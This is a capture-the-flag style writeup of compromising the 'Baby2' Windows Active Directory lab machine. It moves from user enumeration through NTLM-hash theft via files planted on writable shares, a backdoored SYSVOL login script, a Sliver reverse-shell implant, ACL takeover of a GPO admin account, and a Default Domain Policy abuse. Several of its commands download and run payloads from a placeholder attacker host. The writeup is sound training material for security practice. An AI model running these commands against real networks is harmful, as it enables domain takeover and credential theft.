Skip to main content

Machine (Medium) - Baby2

Writeup Author: bobbuilder

Overview

Category: Machine

Difficulty: Medium Windows

Machine Author: xct

Domain: Baby2.vl

Machine: Windows

Objective: This writeup documents the compromise of the Baby2 machine through enumeration of domain users, abuse of writable shares to capture credentials, domain privilege escalation using ACL abuse, and Group Policy Object (GPO) manipulation to achieve administrative access.

User

Enumeration

Enumerate Domain Users via SID Bruteforce

impacket-lookupsid baby2.vl/guest:''@<baby2_ip> -no-pass | grep SidTypeUser | awk -F ' ' '{print $2}'
  • Discovers domain users by querying SIDs anonymously.

Extract SPNs for Kerberoasting

impacket-GetUserSPNs -target-domain baby2.vl -usersfile baby2_users.txt baby2.vl/guest -no-pass
  • Attempts to enumerate service accounts with SPNs; one entry for DC$ discovered, potentially roastable.

Initial Access

Prepare NTLM Stealer Payloads

python3 ntlm_theft.py --generate all --server <attacker_ip> --filename nt
  • Generates files to trigger NTLM authentication back to attacker's server.

Upload Payloads to Writable User Folders

for user in "Amelia.Griffiths" "Harry.Shaw" "Kieran.Mitchell" "Mohammed.Harris" \
            "Joan.Jennings" "library" "Nicola.Lamb" "Carl.Moore" "Joel.Hurst" \
            "Lynda.Bailey" "Ryan.Jenkins"; do
    for file in ~/tools/ntlm_theft/nt/*; do
        filename=$(basename "$file")
        nxc smb <baby2_ip> -u 'guest' -p '' --share homes --put-file "$file" "\\$user\\$filename"
    done
done
  • Mass-deploys NTLM stealer files to users’ home directories on the writable SMB share.

Captured Credentials

baby2.vl/library:<REDACTED>
baby2.vl/Carl.Moore:<REDACTED>

Root

Post-Exploitation

Abuse Login Script for Code Execution

' Located in SYSVOL/baby2.vl/scripts/login.vbs
Set oShell = CreateObject("Wscript.Shell")
oShell.run "cmd.exe /c curl <attacker_ip>:8081/vl.exe -o C:\Windows\Temp\vl2.exe"
oShell.run "cmd.exe /c C:\Windows\Temp\vl2.exe"
  • login.vbs in SYSVOL runs on user login; used to download and execute payload.

Generate Sliver Payload

sudo service sliver start
sliver
generate --os windows --arch 64bit --mtls <attacker_ip> --reconnect 60 --save vl.exe
  • Generates and serves a reverse shell with Sliver framework.

Privilege Escalation

BloodHound Enumeration

  • Revealed user Amelia.Griffiths (member of BABY2\LEGACY) has WriteOwner over user GPOADM.

Import PowerView and Take Ownership

Import-Module .\PowerView.ps1
Set-DomainObjectOwner -Identity GPOADM -OwnerIdentity Amelia.Griffiths
Add-DomainObjectACL -TargetIdentity GPOADM -PrincipalIdentity Amelia.Griffiths -Rights All
Set-DomainUserPassword -Identity GPOADM -AccountPassword (ConvertTo-SecureString 'Password1' -AsPlainText -Force)
  • Takes ownership of GPOADM, grants full rights, and sets a known password.

Abuse Default Domain GPO

python3 pygpoabuse.py BABY2.vl/gpoadm:Password1 -gpo-id '31B2F340-016D-11D2-945F-00C04FB984F9' -powershell -command "certutil -urlcache -split -f http://<attacker_ip>/vl.exe C:/Users/Public/vl.exe; C:/Users/Public/vl.exe" -f
  • Modifies the Default Domain Policy to deliver a Sliver payload and execute it.
Back to top